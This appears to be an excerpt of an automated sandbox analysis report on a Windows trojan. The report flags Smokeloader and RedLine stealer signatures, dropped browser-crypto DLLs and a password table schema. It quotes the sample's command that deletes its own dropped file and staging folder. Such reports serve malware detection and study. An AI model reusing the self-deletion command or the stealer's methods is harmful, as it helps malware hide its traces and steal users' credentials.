Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC94420	9_2_6CC94420
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCBA430	9_2_6CCBA430
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCFA5E0	9_2_6CCFA5E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCBE5F0	9_2_6CCBE5F0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC245B0	9_2_6CC245B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD78550	9_2_6CD78550
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC88540	9_2_6CC88540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD34540	9_2_6CD34540
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC92560	9_2_6CC92560
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCD0570	9_2_6CCD0570
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC546D0	9_2_6CC546D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC8E6E0	9_2_6CC8E6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCCE6E0	9_2_6CCCE6E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC8C650	9_2_6CC8C650
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC5A7D0	9_2_6CC5A7D0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCB0700	9_2_6CCB0700
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC28090	9_2_6CC28090
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD0C0B0	9_2_6CD0C0B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC400B0	9_2_6CC400B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC7E070	9_2_6CC7E070
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCFC000	9_2_6CCFC000
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCF8010	9_2_6CCF8010
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC301E0	9_2_6CC301E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC98140	9_2_6CC98140
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD14130	9_2_6CD14130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCA6130	9_2_6CCA6130
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CDB62C0	9_2_6CDB62C0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD022A0	9_2_6CD022A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCFE2B0	9_2_6CCFE2B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCC8250	9_2_6CCC8250
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCB8260	9_2_6CCB8260
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCFA210	9_2_6CCFA210
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD08220	9_2_6CD08220
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC843E0	9_2_6CC843E0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC623A0	9_2_6CC623A0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC8E3B0	9_2_6CC8E3B0
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC38340	9_2_6CC38340
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD72370	9_2_6CD72370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CC32370	9_2_6CC32370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD4C360	9_2_6CD4C360
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCC6370	9_2_6CCC6370
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CCA2320	9_2_6CCA2320
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: 9_2_6CD6DCD0	9_2_6CD6DCD0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DGHIECGCBKFH\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\DGHIECGCBKFH\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: String function: 004087A0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: String function: 0040F5A0 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: String function: 0061F807 appears 139 times
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: String function: 00618A07 appears 57 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: String function: 6CDBD930 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: String function: 6CDB09D0 appears 229 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: String function: 6CC53620 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: String function: 6CDBDAE0 appears 50 times
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Code function: String function: 6CC59B10 appears 51 times

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548

Source: 3.exe, 00000000.00000000.1980211482.0000000002C8C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe
Source: 3.exe	Binary or memory string: OriginalFilenamesFilezera2 vs 3.exe

Source: 3.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056416748.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000000.00000002.2056350311.0000000002D4B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000005.00000002.2871870285.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@14/35@5/9

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CC90300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

9_2_6CC90300

Source: C:\Users\user\Desktop\3.exe

Code function: 0_2_02D52619 CreateToolhelp32Snapshot,Module32First,

0_2_02D52619

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_0042B20E CoCreateInstance,

5_2_0042B20E

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rcjjrra

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6204
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\A247.tmp

Jump to behavior

Source: 3.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\5358.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\3.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: softokn3[1].dll.9.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.9.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: kat2225.tmp, kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3205397859.000000006CDBF000.00000002.00000001.01000000.0000000C.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr, nss3.dll.9.dr, nss3[1].dll.9.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.9.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: A247.exe, 00000005.00000003.2386153562.0000000002DB8000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2385765464.0000000002DD6000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2411021504.0000000002E52000.00000004.00000800.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2860477821.000000000089E000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2847534612.000000000087C000.00000004.00000020.00020000.00000000.sdmp, BKFBAK.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: kat2225.tmp, 00000009.00000002.3193725371.000000001DDCB000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3192309676.000000001B988000.00000002.00001000.00020000.00000000.sdmp, sqls[1].dll.9.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.9.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: 3.exe

Virustotal: Detection: 47%

Source: unknown	Process created: C:\Users\user\Desktop\3.exe "C:\Users\user\Desktop\3.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\rcjjrra C:\Users\user\AppData\Roaming\rcjjrra
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6204 -s 1548
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A247.exe C:\Users\user\AppData\Local\Temp\A247.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5358.exe C:\Users\user\AppData\Local\Temp\5358.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
